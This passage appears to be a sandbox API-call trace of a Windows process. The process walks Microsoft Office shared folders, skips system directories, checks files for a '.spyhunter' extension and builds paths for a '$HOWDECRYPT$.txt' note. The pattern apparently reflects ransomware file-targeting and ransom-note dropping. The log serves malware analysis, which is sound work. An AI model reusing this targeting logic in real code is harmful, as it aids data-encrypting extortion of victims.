[0088.813] lstrcmpW (lpString1="PRJRES.DLL", lpString2="_uninstalling_.png") returned 1 [0088.813] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 70 [0088.813] GetProcessHeap () returned 0x2c0000 [0088.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x340cb0 [0088.813] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xc70) returned 0x3824f8 [0088.813] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.813] lstrcmpiW (lpString1="RICHED20.DLL", lpString2="Windows") returned -1 [0088.813] lstrlenW (lpString="Windows") returned 7 [0088.813] lstrcmpiW (lpString1="RICHED20.DLL", lpString2="$Recycle.bin") returned 1 [0088.813] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.813] lstrcmpiW (lpString1="RICHED20.DLL", lpString2="System Volume Information") returned -1 [0088.813] lstrlenW (lpString="System Volume Information") returned 25 [0088.813] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL") returned 72 [0088.813] StrStrIW (lpFirst="RICHED20.DLL", lpSrch=".spyhunter") returned 0x0 [0088.813] lstrcmpW (lpString1="RICHED20.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.813] lstrcmpW (lpString1="RICHED20.DLL", lpString2="_uninstalling_.png") returned 1 [0088.813] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL") returned 72 [0088.813] GetProcessHeap () returned 0x2c0000 [0088.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x3851a0 [0088.813] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xc78) returned 0x3824f8 [0088.813] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.813] lstrcmpiW (lpString1="SERCONV.DLL", lpString2="Windows") returned -1 [0088.813] lstrlenW (lpString="Windows") returned 7 [0088.813] lstrcmpiW (lpString1="SERCONV.DLL", lpString2="$Recycle.bin") returned 1 [0088.813] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.813] lstrcmpiW (lpString1="SERCONV.DLL", lpString2="System Volume Information") returned -1 [0088.813] lstrlenW (lpString="System Volume Information") returned 25 [0088.814] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\SERCONV.DLL") returned 71 [0088.814] StrStrIW (lpFirst="SERCONV.DLL", lpSrch=".spyhunter") returned 0x0 [0088.814] lstrcmpW (lpString1="SERCONV.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.814] lstrcmpW (lpString1="SERCONV.DLL", lpString2="_uninstalling_.png") returned 1 [0088.814] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\SERCONV.DLL") returned 71 [0088.814] GetProcessHeap () returned 0x2c0000 [0088.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x340a28 [0088.814] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xc80) returned 0x3824f8 [0088.814] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.814] lstrcmpiW (lpString1="USP10.DLL", lpString2="Windows") returned -1 [0088.814] lstrlenW (lpString="Windows") returned 7 [0088.814] lstrcmpiW (lpString1="USP10.DLL", lpString2="$Recycle.bin") returned 1 [0088.814] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.814] lstrcmpiW (lpString1="USP10.DLL", lpString2="System Volume Information") returned 1 [0088.814] lstrlenW (lpString="System Volume Information") returned 25 [0088.814] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\USP10.DLL") returned 69 [0088.814] StrStrIW (lpFirst="USP10.DLL", lpSrch=".spyhunter") returned 0x0 [0088.814] lstrcmpW (lpString1="USP10.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.814] lstrcmpW (lpString1="USP10.DLL", lpString2="_uninstalling_.png") returned 1 [0088.814] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\USP10.DLL") returned 69 [0088.814] GetProcessHeap () returned 0x2c0000 [0088.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x340d88 [0088.814] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xc88) returned 0x3824f8 [0088.814] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.814] lstrcmpiW (lpString1="VBAJET32.DLL", lpString2="Windows") returned -1 [0088.814] lstrlenW (lpString="Windows") returned 7 [0088.814] lstrcmpiW (lpString1="VBAJET32.DLL", lpString2="$Recycle.bin") returned 1 [0088.814] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.814] lstrcmpiW (lpString1="VBAJET32.DLL", lpString2="System Volume Information") returned 1 [0088.814] lstrlenW (lpString="System Volume Information") returned 25 [0088.815] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\VBAJET32.DLL") returned 72 [0088.815] StrStrIW (lpFirst="VBAJET32.DLL", lpSrch=".spyhunter") returned 0x0 [0088.815] lstrcmpW (lpString1="VBAJET32.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.815] lstrcmpW (lpString1="VBAJET32.DLL", lpString2="_uninstalling_.png") returned 1 [0088.815] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\VBAJET32.DLL") returned 72 [0088.815] GetProcessHeap () returned 0x2c0000 [0088.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x385440 [0088.815] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xc90) returned 0x3824f8 [0088.815] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.815] lstrcmpiW (lpString1="WISC30.DLL", lpString2="Windows") returned 1 [0088.815] lstrlenW (lpString="Windows") returned 7 [0088.815] lstrcmpiW (lpString1="WISC30.DLL", lpString2="$Recycle.bin") returned 1 [0088.815] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.815] lstrcmpiW (lpString1="WISC30.DLL", lpString2="System Volume Information") returned 1 [0088.815] lstrlenW (lpString="System Volume Information") returned 25 [0088.815] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\WISC30.DLL") returned 70 [0088.815] StrStrIW (lpFirst="WISC30.DLL", lpSrch=".spyhunter") returned 0x0 [0088.815] lstrcmpW (lpString1="WISC30.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.815] lstrcmpW (lpString1="WISC30.DLL", lpString2="_uninstalling_.png") returned 1 [0088.815] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\WISC30.DLL") returned 70 [0088.815] GetProcessHeap () returned 0x2c0000 [0088.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x340e60 [0088.815] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xc98) returned 0x3824f8 [0088.815] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0088.815] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0088.816] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\$HOWDECRYPT$.txt") returned 76 [0088.816] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\$HOWDECRYPT$.txt") returned 76 [0088.816] GetProcessHeap () returned 0x2c0000 [0088.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x373268 [0088.816] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xca0) returned 0x3824f8 [0088.816] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0088.816] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="Windows") returned -1 [0088.816] lstrlenW (lpString="Windows") returned 7 [0088.816] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="$Recycle.bin") returned 1 [0088.816] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.816] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="System Volume Information") returned -1 [0088.816] lstrlenW (lpString="System Volume Information") returned 25 [0088.816] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform") returned 83 [0088.816] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2=".") returned 1 [0088.817] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="..") returned 1 [0088.817] GetProcessHeap () returned 0x2c0000 [0088.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0088.817] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*") returned 85 [0088.817] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0088.818] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0088.818] lstrlenW (lpString="Windows") returned 7 [0088.818] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0088.818] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.818] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0088.818] lstrlenW (lpString="System Volume Information") returned 25 [0088.818] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\.") returned 85 [0088.818] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.818] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.818] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0088.818] lstrlenW (lpString="Windows") returned 7 [0088.818] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0088.818] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.818] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0088.818] lstrlenW (lpString="System Volume Information") returned 25 [0088.818] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\..") returned 86 [0088.818] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.818] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.818] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.818] lstrcmpiW (lpString1="OSPPC.DLL", lpString2="Windows") returned -1 [0088.818] lstrlenW (lpString="Windows") returned 7 [0088.818] lstrcmpiW (lpString1="OSPPC.DLL", lpString2="$Recycle.bin") returned 1 [0088.818] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.819] lstrcmpiW (lpString1="OSPPC.DLL", lpString2="System Volume Information") returned -1 [0088.819] lstrlenW (lpString="System Volume Information") returned 25 [0088.819] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL") returned 93 [0088.819] StrStrIW (lpFirst="OSPPC.DLL", lpSrch=".spyhunter") returned 0x0 [0088.819] lstrcmpW (lpString1="OSPPC.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.819] lstrcmpW (lpString1="OSPPC.DLL", lpString2="_uninstalling_.png") returned 1 [0088.819] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL") returned 93 [0088.819] GetProcessHeap () returned 0x2c0000 [0088.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfc) returned 0x37a980 [0088.819] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xca8) returned 0x3824f8 [0088.819] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.819] lstrcmpiW (lpString1="OSPPCEXT.DLL", lpString2="Windows") returned -1 [0088.819] lstrlenW (lpString="Windows") returned 7 [0088.819] lstrcmpiW (lpString1="OSPPCEXT.DLL", lpString2="$Recycle.bin") returned 1 [0088.819] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.819] lstrcmpiW (lpString1="OSPPCEXT.DLL", lpString2="System Volume Information") returned -1 [0088.819] lstrlenW (lpString="System Volume Information") returned 25 [0088.819] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL") returned 96 [0088.819] StrStrIW (lpFirst="OSPPCEXT.DLL", lpSrch=".spyhunter") returned 0x0 [0088.819] lstrcmpW (lpString1="OSPPCEXT.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.819] lstrcmpW (lpString1="OSPPCEXT.DLL", lpString2="_uninstalling_.png") returned 1 [0088.819] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL") returned 96 [0088.819] GetProcessHeap () returned 0x2c0000 [0088.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x102) returned 0x37aa88 [0088.819] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xcb0) returned 0x3824f8 [0088.819] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.819] lstrcmpiW (lpString1="osppobjs-spp-plugin-manifest-signed.xrm-ms", lpString2="Windows") returned -1 [0088.819] lstrlenW (lpString="Windows") returned 7 [0088.820] lstrcmpiW (lpString1="osppobjs-spp-plugin-manifest-signed.xrm-ms", lpString2="$Recycle.bin") returned 1 [0088.820] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.820] lstrcmpiW (lpString1="osppobjs-spp-plugin-manifest-signed.xrm-ms", lpString2="System Volume Information") returned -1 [0088.820] lstrlenW (lpString="System Volume Information") returned 25 [0088.820] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms") returned 126 [0088.820] StrStrIW (lpFirst="osppobjs-spp-plugin-manifest-signed.xrm-ms", lpSrch=".spyhunter") returned 0x0 [0088.820] lstrcmpW (lpString1="osppobjs-spp-plugin-manifest-signed.xrm-ms", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.820] lstrcmpW (lpString1="osppobjs-spp-plugin-manifest-signed.xrm-ms", lpString2="_uninstalling_.png") returned 1 [0088.820] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms") returned 126 [0088.820] GetProcessHeap () returned 0x2c0000 [0088.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x13e) returned 0x37ab98 [0088.820] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xcb8) returned 0x3824f8 [0088.820] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.820] lstrcmpiW (lpString1="OSPPOBJS.DLL", lpString2="Windows") returned -1 [0088.820] lstrlenW (lpString="Windows") returned 7 [0088.820] lstrcmpiW (lpString1="OSPPOBJS.DLL", lpString2="$Recycle.bin") returned 1 [0088.820] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.820] lstrcmpiW (lpString1="OSPPOBJS.DLL", lpString2="System Volume Information") returned -1 [0088.820] lstrlenW (lpString="System Volume Information") returned 25 [0088.820] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL") returned 96 [0088.820] StrStrIW (lpFirst="OSPPOBJS.DLL", lpSrch=".spyhunter") returned 0x0 [0088.820] lstrcmpW (lpString1="OSPPOBJS.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.820] lstrcmpW (lpString1="OSPPOBJS.DLL", lpString2="_uninstalling_.png") returned 1 [0088.820] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL") returned 96 [0088.820] GetProcessHeap () returned 0x2c0000 [0088.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x102) returned 0x37ace0 [0088.821] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xcc0) returned 0x3824f8 [0088.821] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.821] lstrcmpiW (lpString1="OSPPREARM.EXE", lpString2="Windows") returned -1 [0088.821] lstrlenW (lpString="Windows") returned 7 [0088.821] lstrcmpiW (lpString1="OSPPREARM.EXE", lpString2="$Recycle.bin") returned 1 [0088.821] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.821] lstrcmpiW (lpString1="OSPPREARM.EXE", lpString2="System Volume Information") returned -1 [0088.821] lstrlenW (lpString="System Volume Information") returned 25 [0088.821] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE") returned 97 [0088.821] StrStrIW (lpFirst="OSPPREARM.EXE", lpSrch=".spyhunter") returned 0x0 [0088.821] lstrcmpW (lpString1="OSPPREARM.EXE", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.821] lstrcmpW (lpString1="OSPPREARM.EXE", lpString2="_uninstalling_.png") returned 1 [0088.821] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE") returned 97 [0088.821] GetProcessHeap () returned 0x2c0000 [0088.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x104) returned 0x37adf0 [0088.821] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xcc8) returned 0x3824f8 [0088.821] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.821] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="Windows") returned -1 [0088.821] lstrlenW (lpString="Windows") returned 7 [0088.821] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="$Recycle.bin") returned 1 [0088.821] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.821] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="System Volume Information") returned -1 [0088.821] lstrlenW (lpString="System Volume Information") returned 25 [0088.821] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE") returned 95 [0088.821] StrStrIW (lpFirst="OSPPSVC.EXE", lpSrch=".spyhunter") returned 0x0 [0088.821] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.822] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="_uninstalling_.png") returned 1 [0088.822] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE") returned 95 [0088.822] GetProcessHeap () returned 0x2c0000 [0088.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x100) returned 0x37af00 [0088.822] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xcd0) returned 0x3824f8 [0088.822] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.822] lstrcmpiW (lpString1="OSPPWMI.DLL", lpString2="Windows") returned -1 [0088.822] lstrlenW (lpString="Windows") returned 7 [0088.822] lstrcmpiW (lpString1="OSPPWMI.DLL", lpString2="$Recycle.bin") returned 1 [0088.822] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.822] lstrcmpiW (lpString1="OSPPWMI.DLL", lpString2="System Volume Information") returned -1 [0088.822] lstrlenW (lpString="System Volume Information") returned 25 [0088.822] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.DLL") returned 95 [0088.822] StrStrIW (lpFirst="OSPPWMI.DLL", lpSrch=".spyhunter") returned 0x0 [0088.822] lstrcmpW (lpString1="OSPPWMI.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.822] lstrcmpW (lpString1="OSPPWMI.DLL", lpString2="_uninstalling_.png") returned 1 [0088.822] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.DLL") returned 95 [0088.822] GetProcessHeap () returned 0x2c0000 [0088.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x100) returned 0x37b008 [0088.822] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xcd8) returned 0x3824f8 [0088.822] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.822] lstrcmpiW (lpString1="OSPPWMI.MOF", lpString2="Windows") returned -1 [0088.822] lstrlenW (lpString="Windows") returned 7 [0088.822] lstrcmpiW (lpString1="OSPPWMI.MOF", lpString2="$Recycle.bin") returned 1 [0088.822] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.822] lstrcmpiW (lpString1="OSPPWMI.MOF", lpString2="System Volume Information") returned -1 [0088.822] lstrlenW (lpString="System Volume Information") returned 25 [0088.823] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF") returned 95 [0088.823] StrStrIW (lpFirst="OSPPWMI.MOF", lpSrch=".spyhunter") returned 0x0 [0088.823] lstrcmpW (lpString1="OSPPWMI.MOF", lpString2="$HOWDECRYPT$.txt") returned 1 [0088.823] lstrcmpW (lpString1="OSPPWMI.MOF", lpString2="_uninstalling_.png") returned 1 [0088.823] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPWMI.MOF") returned 95 [0088.823] GetProcessHeap () returned 0x2c0000 [0088.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x100) returned 0x37b110 [0088.823] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xce0) returned 0x3824f8 [0088.823] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0088.823] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0088.824] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\$HOWDECRYPT$.txt") returned 100 [0088.824] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\$HOWDECRYPT$.txt") returned 100 [0088.824] GetProcessHeap () returned 0x2c0000 [0088.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x10a) returned 0x37b218 [0088.824] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xce8) returned 0x3824f8 [0088.824] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0088.824] lstrcmpiW (lpString1="PROOF", lpString2="Windows") returned -1 [0088.824] lstrlenW (lpString="Windows") returned 7 [0088.824] lstrcmpiW (lpString1="PROOF", lpString2="$Recycle.bin") returned 1 [0088.824] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.824] lstrcmpiW (lpString1="PROOF", lpString2="System Volume Information") returned -1 [0088.824] lstrlenW (lpString="System Volume Information") returned 25 [0088.824] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF") returned 56 [0088.824] lstrcmpW (lpString1="PROOF", lpString2=".") returned 1 [0088.824] lstrcmpW (lpString1="PROOF", lpString2="..") returned 1 [0088.824] GetProcessHeap () returned 0x2c0000 [0088.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0088.824] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*") returned 58 [0088.824] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0088.831] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0088.831] lstrlenW (lpString="Windows") returned 7 [0088.831] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0088.831] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.831] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0088.831] lstrlenW (lpString="System Volume Information") returned 25 [0088.831] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\.") returned 58 [0088.831] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.832] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.832] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0088.832] lstrlenW (lpString="Windows") returned 7 [0088.832] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0088.832] lstrlenW (lpString="$Recycle.bin") returned 12 [0088.832] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0088.832] lstrlenW (lpString="System Volume Information") returned 25 [0088.832] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\..") returned 59 [0088.832] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.832] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.832] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0088.832] lstrcmpiW (lpString1="MSLID.DLL", lpString2="Windows") returned -1 [0088.832] lstrlenW (lpString="Windows") returned 7 [0088.832] 